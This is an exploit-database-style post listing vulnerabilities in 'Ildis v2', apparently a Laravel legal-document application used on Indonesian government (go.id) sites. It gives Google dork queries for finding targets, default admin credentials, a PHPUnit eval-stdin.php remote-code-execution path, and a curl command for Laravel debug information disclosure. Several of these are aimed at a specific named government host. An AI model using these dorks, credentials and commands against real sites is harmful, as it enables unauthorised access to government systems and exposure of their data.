# Exploit Title : Ildis v2 Applications Multiple Vulnerabilities
# Vendor Homepage : http://jdihn.go.id
# Discovered By: KimiHmei7
# Author Homepage:
https://tegalsec.org
https://draxploit.web.id
# Framework: Laravel
# Google Dork:
"ILDIS" site:go.id
inurl:?tipe_dokumen= site:go.id
inurl:/data_dokumen site:go.id
intitle:Signin | ILDIS JDIHN
# Vulnerabilities
1. Default Login
https://site.go.id/login admin | admin123
2. PHPUnit Remote Code Execution
http://jdih.dprd.belitung.go.id//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php (blank, maybe vuln but can't get RCE access. other sites using same path)
3. Laravel Debug Missconfiguration / information disclosure
$ curl -d 1=1 http://jdih.dprd.belitung.go.id/
Thanks to DragonXploiter (Haikal)